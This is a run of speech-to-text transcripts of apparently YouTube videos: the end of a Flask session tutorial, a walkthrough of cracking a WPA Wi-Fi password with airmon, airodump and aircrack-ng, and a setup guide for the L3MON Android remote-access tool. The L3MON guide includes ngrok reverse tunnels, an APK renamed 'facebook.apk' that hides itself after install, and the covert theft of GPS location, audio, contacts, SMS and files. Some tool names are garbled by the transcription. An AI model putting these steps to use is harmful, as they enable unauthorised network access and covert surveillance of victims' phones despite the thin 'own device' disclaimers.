doing this, return to redirect URL underscore 4, which I have imported, but I will import in a second. URL underscore 4, and it will actually create the URL endpoint for main chat page, right? Chat page. Perfect. Now if I go inside the server, hopefully no errors. Okay, and now if I come back in here, reload this page, so resubmit the page, the request is not defined. Why is request not defined? Okay, let me just go and define request. I have defined the request, but I don't know what happened. So if I reload this page again, hopefully no errors this time. Chat page, oops, hey, I'm really sorry, just chat page, and reload this page and submit the form. Will hopefully submit the data to the backend. You can see post to the login is over here, and you can see main chat page. Now if you have noticed another feature over here, even if I haven't logged in, it will actually, if I can actually say like /main type enter, it will actually redirect me the main chat page without even logging in, right? So here you have to check every time when a user is trying to access to the main chat page. You have to check if the user is logged in or out. So first of all, we have to create a logout button to log out or the current session of the user. So say /logout, inside here you say logout, and I'll say session dot pop user. So this is actually an error. If the user is not logged in, it will result in an error. I will be correcting in a second over here. If I go to the logout and type enter, it will actually make to log out. Okay, I haven't returned anything, so let me just return redirect URL underscore 4. I will be returning the URL for login. Save that. Insert in here. Okay, just post this over here. Okay, let me just go and say /logout, type enter. You can see it actually popped the session of the current user over here and redirected me back to the login. Hope you have remembering the redirect and the URL for function that I have already explained the part 2 of this video. So you can see chat page. Now I'm actually logged out. So if I can say /main and type enter, you can see I can access the chat page without even logging in. So that's a really security breach. So in order to check if the user exists, and just do if user in session, then return to the main page. Else we will do is return redirect URL 4, and we will be returning redirect URL for login. So now it's set up, and even if the user is not logged in, we will not actually get into the main page. Let's say main and type enter. Main type enter. You can see the user is not currently logged in, and we have redirected back the user to the login page. Now we have successfully returned our user back to login page. Like, hey, you haven't logged in, go and log in first. So I have to log in now. So I'll say hello and press login. You can see main chat page. Now if I go back and forth, I can actually come inside here, reload, and I can stay in this page. So if I say log out and type enter, you can see we are back in the login page. And if I say main and type enter, you may not access the main page of the chat application. So that's the user session. So that's it for this video. We have learned how to retrieve data from the user, how to log in a user using session, etc. So in the next video, we will be learning how to retrieve data from the Flask backend to the front end. Now currently we have retrieve data from front end to backend. Now we are going to send data from backend to front end using Jinja template. So stay tuned. Thank you for watching. If you have any doubts or comments regarding this topic, just put in the comment below. I would definitely check in that. So thank you for watching. Have a nice day. Bye. Today I'm going to show you how to hack into a Wi-Fi network and gain its password. So this is going to be the re-upload of the video that I have already done, Wi-Fi hacking video. I am re-uploading this because my video got taken down by the YouTube community guidelines, and I would love to get striked again. Nah, I'm just kidding. I'm really sad. And someone actually told me to re-upload this video for some future references, I think. So that's why I'm re-uploading this video. So be it. Before we get started, as always, a quick disclaimer that please make sure that you learn something from this and know how an attacker actually attacks a Wi-Fi network and gains its password or brute force the password. Don't test it on others' network and get into some kind of trouble. Test it on your own network and understand how this works and how you can secure your own password. And sorry if you're having any audio issue. So with that being said, let's get started.
The video will be split up to 4 steps. Step number 1 will be putting your Wi-Fi card to monitor mode.
The step number 2 will be actually capturing the available Wi-Fi networks around you. And the third step is to actually capture the WPA handshake from our victim. And the fourth step will be actually cracking the WPA handshake and getting the passwords ultimately. Let us get to our first step, which is actually installing our tools. But I haven't included that in our steps because it's actually already installed on Kali Linux. It should be if you're using that. But for me, I'm using in Linux Mint, so I have to actually install that. Password and it's already installed. I didn't know that. So now let us start with step number 1, which is actually put your Wi-Fi card to monitor mode. For that, first type in ifconfig, and it should return something like this, and you should get the name of the wireless Wi-Fi card of the device. For me, it's WLP1S0. Now let me just clear that and type in Herman ng start WLP1S0. Oops, I just forgot to give it root privileges. Sudo, and you can see something like this. You can see the information about your driver, the chipset that you're using, etc, etc. And now you can see the Wi-Fi is disconnected for a device. That means you have put your Wi-Fi card to monitor mode. So now if this works, now we have actually successfully managed to put our wireless card to monitor mode. Now we have to actually check if this thing captures anything. So for that, type in sudo arrow dumping, and you can see your wireless card's name has been changed to WLP1S0 mod. That means you have to type in WLP1S0 mod, which stands for monitor mode. Type enter, and it should show something like this. And you can see something is actually popping up on my screen. You should also probably get something like this. So now we have successfully completed 2 steps, which was first step number 1, which is actually put your Wi-Fi card to monitor mode, and the second step was to actually capture the wireless networks around you. So now we are moving on to the step number 3, which is actually capture a WPA handshake from our victim. Our victim over here is this one, which is, let me just go ahead and copy that. Now we are at step number 3 to actually capture the WPA handshake of our victim. So for that, we are going to open up a new terminal and type in sudo arrow dumping, and we have to pass the BSS ID which we have targeting on, so which will be this one that I have copied earlier. So paste that. Now we have to actually pass the channel number which we are listening on, which will be channel 9. And now we have to actually write the captured data to a file, which will be WPA, and type in the monitor name of the card, P1S0 mod, that enter, and it will show like this. So basically what it does is that it will actually wait for a client to actually disconnect from the AP and actually reconnect from the access point. So resulting, we will be capturing a WPA handshake from the victim. So now let us go ahead and stop this and wait for the victim to actually disconnect and reconnect, and hopefully we'll get a capture handshake.
A few moments later.
There we are. We got the handshake, WPA handshake on the BSS ID, and it has been saved to the WPA file. So now after capturing the WPA handshake, if you look inside the directory, you can see something like this, WPA1.cap file, and different kinds of file named that. So we are interested in WPA1.cap file. Now we are going to actually decrypt the password. For that, type in sudo aircrackng, and pass the file name, which will be WPA1.cap file. Then pass the word list which we are using to actually decrypt the password -w and the word list file. Press type enter and you can see we got the key which is 1 2 3 4 5 6 7 8. We have found the key of the access point this fast because we only have about 25 keys to be tested and it only has tested 7 keys to find the password. So if you're on Kali Linux, there will be a file named rocket.txt inside /word list. You can use that if you have a big password to crack on. So it will take some time to actually crack the password, but hopefully we got the password. So now we have to actually stop the monitor mode and revert it back to normal mode, right? So for that, type in sudo airman ng stop and the card name, which will be w1 p1 s0 mon, and type enter. And it will be reverted back to normal mode, and let me just go and test if the password was correct. So you can see Wi-Fi is showing up, victim's Wi-Fi. If I type in 1 2 3 4 5 6 7 8 and if I connect, you can see we have connected to the victim's Wi-Fi over here.
Plus, I thought that I could add some more content to this video on how to secure your password. So for securing your password, you must at least have an 8-character length password, a combination of uppercase, lowercase, numerals, alphabet, special characters, etc. A combination of this will get us protected from this kind of brute force attack from your Instagram account to Wi-Fi password. Make sure that at least you have a 8-character length password and has a combination of letters, numbers, and so on. So that's it for this video. Make sure that you like and subscribe to my channel. Our new will be coming up real soon. So if you have any questions or comments regarding this topic, just put it in the comments below. I'll be definitely checking that. So until then, as always, ciao. What's up guys, and welcome back to the YouTube video. So in today's video we are going to learn about Lemon, how to use Lemon, how to get started with Lemon, and how to use a Lemon to connect it to your own Android device in which you have authorization for. So this video doesn't have any connection with the H word because I'm not going to use the H word anymore, because this video is made solely to learn and understand how to use Lemon to connect it to your own Android device, and learn how to use Lemon in case you have to connect to your own Android device from your computer. So the sole existence of Lemon is to understand and connect your own Android device in the need from your computer. So Lemon is a tool which is used to remote access your Android device from your laptop or PC. You can just install an Android RAT in your Android device, and you can actually control your Android device from your PC or computer or whatever devices you use. The better thing about Lemon is that it has a GUI you can actually operate into. If you use ADB or scrcpy or the metasploit framework that I have already shown in the other two videos, it actually doesn't have a GUI, and it's kind of really hard to use them. So the Lemon framework is really easy to use compared to the metasploit framework. They both do exactly the same job and the same process, but in different way, of course. So this is going to the part 2 of the video series, the H video series, but I'm going to not say that word, you know what I mean. So this is going to the part 2 of the H series, so you can just watch the first part of this video. This video doesn't have any connection with that video, but you can just watch the part 1 of the video. I'll be putting in the somewhere, you can just watch that. So in that video I have shown how to use ADB, scrcpy, and metasploit to connect it to your own Android device. So you can just go ahead and watch that. It will be really informative and helpful also if you are into this topic. So that's pretty much for the intro. Let me just, without any further ado, not so fast. So I just want to tell you guys that there are millions of channels providing the same content. So you probably think that what's the difference between us and them?
So the main difference between us and them is that they do have like millions of subscribers and we have like 700 subscribers. So please do subscribe to my channel. It will mean a lot to me. If you want to see more content like this coming up soon, do subscribe. So let's get right into the topic. Without further ado, let's get started. So guys, before we get started, let me just show you a quick sneak peek over the Lemon framework. So this is the user interface of a Lemon, and you can see the info, first seen and last seen of that person. If you want to get the real-time update GPS location of that person, you can actually get the GPS location request update, or you can actually set that time for in which you have to update the GPS location of the Android device. And you can use the microphone tab to record the audio from the Android device, or you can use the contacts tab to get the contacts inside the Android device. I'm not going to show you the call log, contacts, SMS, etc. because it may contain my personal information because I'm doing it on my own Android device. So you can actually get the clipboard log, notification log, SMS manager, everything is working. I'll be showing some of them at the end of this video. I'll just show some of them at the end of the video, but I'll be just showing what the things that you can actually do using the Lemon framework. So if I go to the install apps, you can see all the installed apps inside this Android device, so on and so on, etc. You can just get inside the file explorer of this Android device, and you can actually download any files to your laptop. And also you can actually use the NGROC to actually tunnel the connection between the control panel as well as your connection. You can actually access this control panel anywhere you want, as well as the Android device anywhere you want. If I use this URL over here, I'll be showing how to set up this connection in this video. So hop along, paste this URL over here, type enter. So as you can see, I have used the public URL. Actually, I can use this URL anywhere, anytime. So click on admin, and my password is a real secret one. I'll be showing that also in this video. So you can see the device is currently offline and I have access to this control panel anywhere, anytime. So let's get started. So guys, here we are. So let's get started by installing Lemon to your laptop or PC so that you can control your Android device in the time of need and do this awesome thing. So let me just go ahead and open up my browser and type in L3mon and type enter. And the first link that you see will be a GitHub link that I'll be also providing in the description. You can just go ahead and grab the link from there and follow along with this tutorial. So let me just go ahead and open up the link over here. So as you can see, you will see a page like this. So if you're kind of pro, you can just follow along with this installation process. So I'll be doing it here right now. You can just follow along with me, or you can just, read through this, but you will be encountering some sort of errors and all. You can just follow along with me, so it will be really easy and understanding and all. So the first things first, we have to install Java. So we have to install Java. So copy this code, open up your terminal, nice and easy, and paste it over here inside my terminal. And so you can see it is already installed on my system. So let's clear out that. Now the next step is to install Node.js. So if you are using any other operating system other than Ubuntu and Debian, you can just go inside the instructions here and search for your operating system. But if you're using Debian, this should install Node.js. Install Node.js, type enter, and just install that.
Alright, now you have successfully installed Node.js. So it should also have npm. No, you have to install npm too. So you have to install npm to work with Node.js. So install node package manager. So there we are, it's installing. So by that time, let me just go and explore the next step, that is npm install pm2-g. Just copy that. So guys, here we have successfully installed Node.js and Node Package Manager. So let me just come inside in here and copy the next step. Copy that and paste it right over here and type enter. So I'm really sorry guys, that was due to some permission error, as well as I had some conflicting files. That was a problem for the error. So now you have to type in sudo npm install pm2-d so that we give sufficient permission for the npm to install. So type enter. So there we are, we have successfully installed the pm2. So now on to the next step. So now you have to download and install the latest release of Lemon. So just open up in a new tab. There we are. Now let me just go ahead and download the zip file. Very big. Let me just download the zip file and save the file. So guys, here we are, we have successfully downloaded Lemon. Let me just go open up the folder. Now inside downloads, let me just go ahead and use the terminal to navigate. cd 2/downloads. There we are. Let me just go ahead and make it full screen. Okay, here we are. You can see lemon.zip file is over here. I put that inside in here, so you can see it is unzipped. Now if I type ls, you can see the lemon is directly unzipped over here. So let me just go ahead and transfer all of this file to the desktop and work from there. So guys, I have created a folder named L3mod in my desktop and successfully moved all the files of L3mod to this folder or inside desktop. So let me just go ahead and navigate to desktop, cd to desktop. There we are. Let's clear this screen. cd to L3mod again and type ls. You can see that now we are successfully inside the directory of L3mod. Now the next step, we're just gonna see the next step. Now you can see after downloading and extracting the latest release from here, you have to do npm install to install the necessary dependencies. So npm install and type enter. Next step is to install. Next step is to start index.js. So let's wait until this installs all the dependencies in order to start the server. So guys, we have successfully completed all the necessary installation steps. We have done till here installation of dependencies, and the next step is to start the index.js file and view the web page. So let me just go ahead and copy this. Or let me just type in pm2 start index.js and type enter, and it will start the web page. So let me just go inside. The next step is to type in pm2 startup, type enter, and it will actually start up the web page, and we can actually view the web page. Just type in 127.0.0.1 over the port 22533 and type. Before you type enter, you can see down in here, you can see in your browser navigate to this IP. So I'll be doing that. I'm doing this right now. So type enter. So as you can see, it will actually redirect you to a page like this.
it will ask you for the username and password, which obviously we haven't created, but we will be creating it in a second. So let's go and create our password. So now how to create your own password for Lemon. So in order to create your own password, type ls and you can see a file named main.db.json. So use your favorite text editor to open up that. So just use mouse pad to open up this file and you can see a file like this. Let me just zoom in. Hope you guys can see this. So if I zoom in, you can see username admin and the password is not filled up. So the password might be a MD5 hash. So when you enter the password, the server will actually hash it as MD5 and compare with this password. So you must paste the password as MD5 hash. So in order to create a MD5 hash, you can just type in MD5 hash creator. You can use inbuilt Linux. Some commands are there which I don't remember, so I'm going to use an online MD5 hash generator and use that to create the MD5 hash for me. So let me zoom in some more. Inside in here, I type in admin as my password and generate. And you can see MD5 hash. Just copy this one and come inside the mouse pad and paste it over there. There we are. So that's it. Control S to save and close the mouse pad. So let me just clear this out. Now we have to restart our server in order for the changes to happen. So I'll type in pm2 restart all. And it will actually restart our server and the necessary changes that we have made it will be updated. So we just clear out that too and come back to the web page. There we are back in our login page. If I type in admin and the password as admin, and if I type login, we can see we have successfully logged into our Lemon. You can see it's an awesome GUI. You can just use the APK builder to create the APK and it will be an install. You can install on your Android device and connect it to your Android device. And you can see you'll have the event log in which any errors or something warnings will be logged in this tab. And inside devices you can see online offline devices that we have. So how we are going to connect, how we are going to create our APK. So I'm going to use ngrok to route the connection through the internet to my laptop over here. So you can, if you are in local host, I mean if the Android device is connected over your Wi-Fi, you can actually use the IP address of your laptop to do so. But I actually wanted my Android device to be connected across the internet. That's why I'm going to use ngrok to route the connection, I mean tunnel the connection back to me. So for that, just type in ngrok and type enter, and you will see ngrok.com, ngrok online in one line. So press that. So now just go to the downloads. And choose your operating system, and I'm in Linux. You can just click this download button and you can download the ngrok and extract it to desktop or downloads or whatever folder. After that, you have to log in to ngrok and there will be an authentication token given to you so that you can access your account. So after logging into your ngrok account inside dashboard, you will see a token like this: ngrok config add token and the authentication token. So it is used to access your account. So you have to type enter after copying and pasting it in the terminal where you have your ngrok. In my case, I am in desktop and I placed the ngrok over desktop. So I have to paste the authentication token in the desktop. So just do that and you get the access to your account. So after pasting in your ngrok authentication token, you can just type in ngrok tcp some port number and type enter, and it will actually show session status online. So as a green light, you have successfully set up ngrok. So stop it using Ctrl+C. So after that, come back to the control panel of the lemon, and you can click on the APK builder tab, and you will see a APK builder section over here. So you have to pass your public IP address over here and click on build. So wait a minute, the thing is that you have to connect to the Android device over the internet, right? So I have told you I have created the ngrok for doing that, but the thing is that we have to create two tunnels for this to work, because one thing is that we have to access this lemon control panel, using a link so that we can actually control it anywhere we want, and the second tunnel is to actually get the reverse connection of the Android device back to us. So we'll be getting €2 creating two tunnels. One will be to control this control panel, and the second one will be to actually get the reverse connection back to us. So for that, go to your desktop, inside the home folder. You will be seeing nothing, because we have this hidden folder. Type Control H, and you will see a config.config folder. Inside in here you will see inside in here you can see a folder named ngrok. Inside of that you will see a file named ngrok.yml. so let me just go ahead and edit that, open with mousepad. So the thing we are going to do here is that we are going to create tunnels. Just bear with me and type along. So the thing is that any spaces or indentation levels is a real mistake here, so make sure that you follow along. So type enter. So we are going to create two apps. Correctly, we have to type in 4 spaces, not tab, only spaces, 1 2 3 4, and type in app1, and insert in here 1 2 3 4 spaces, and we'll pass the address ADDR, and it will be, so the first port number will be 22533, and don't forget to leave a space over here. And after that address, and we had to specify the proto, which will be HTTP, and down in here we have to pass the app2, which will be having the next address, which will be 1 2 3 4 5, and type enter. And if I type in the proto, which will be the TCP protocol in this case. So after this, type save and close the configuration file, and now type in /ngrok start all, and it will actually start the TCP as well as the HTTP tunnel which we have created. Start all, type enter. Oops, what the hell happened? All right, now I think it's start all. Yeah, there we are. So we have successfully created the tunnels that we needed. Just zoom out. All right, and you can now see that we have created 2 tunnels, one for the HTTP connection, in which we can actually access the control panel of the lemon, and the next URL we have created is that which we have to pass on to the the APK builder. So let me just go ahead and copy this from 0 to ngrok.io, and copy this using Shift Ctrl+C, and paste that IP over here, and the port number we have to change to the port number in which we have passed over here, which will be 19496. So 19496. So click on build. It will probably take like less than 10 seconds, and it actually compile the APK, and you can actually click on download that 11
corrupted Android APK file. So guys, here we are. As you can see that the APK builder has successfully created the APK file. So let me just click on download, and you'll actually download the APK. So save file, download, click on OK, and it actually download lemon. So there we are. We have successfully created the APK file. So now we have to install it and test it on my Android device. So guys, I have successfully installed the lemon.apk inside my Android device. So I have actually renamed the lemon to something like facebook.apk. After installation, the app is nowhere to be seen. It's already hidden, and it will have asked for directly to the permission, and I have enabled every permission needed for this application to work, and it is hidden and I can see nowhere. I'm sorry, I can't show you the screen right now. So it will be hidden, it will not be seen nowhere. So that's right. And if I go back to devices, you can see online device, Xiaomi, and the last seen, and click on manage to have control over the Android device. We can actually request GPS. First of all, click on GPS, request update, and it will actually update the location of the person. And if I go over to the GPS log, you can see view the GPS log of that person. If I go to GPS settings, you can actually set how much time you have to update, in which interval you have to update the person's location. You can actually use the microphone to control the microphone, grab some audio from the person, and you can use contact list to get the contact of that person. I'm not doing this because I don't want to show my personal information outside, so that's why I'm not trying it. But you can definitely try and see. It definitely works. I have tried it. It is working perfectly well. And we can see notification log, call log, Wi-Fi manager, installed apps. Let me just view installed apps. Fair enough. Safari request update. So as you can see, I have got all the apps that is installed on this Android device. So let me just go to SMS show. Do I have to show? No, I'm not going to show my SMS. Let me just go inside the File Explorer and show some other things. So you can see I'm inside the File Explorer, and if I use, let me just go inside Telegram. Because the files, please wait, and it is actually okay, and here we are. So let me just go inside Telegram images, requesting files, please wait, and it actually load up the files. It's probably because of so much of files. You can actually download any files that is inside this Android device. Let's try again that. So File Explorer, go to Telegram documents. Here we are. We have actually loaded up that anyways. So let me just download the smallest file possible. So you can see there's so much of files. That's why it took so much time to download. Let me just download this PDF. Probably PDF is small, so just download that and see. So I have downloaded that. Some notification has been seen. So if you come down to downloads, you can actually download and view the downloaded files. So alright guys, that's it for now. I'm not going to show you this PDF because it may contain some important documents. Let me just show you that it's downloadable. You can click save and save this file and download and view the file, whatever files inside the Android device. You can get the call log, the clipboard log, notification log, the SMS of that person, etc. and etc. So that's it. So as you can see, I have downloaded the PDF to my downloads folder. So guys, thank you for watching this video. Please make sure that you like and subscribe to my channel. Obviously, I haven't filmed the content yet because I just filmed the intro and the end in a row. So please do like, subscribe to my channel. If you have any comments or questions regarding this topic, just put in the comment below. I will definitely check in that.
So thank you for watching and have a nice time.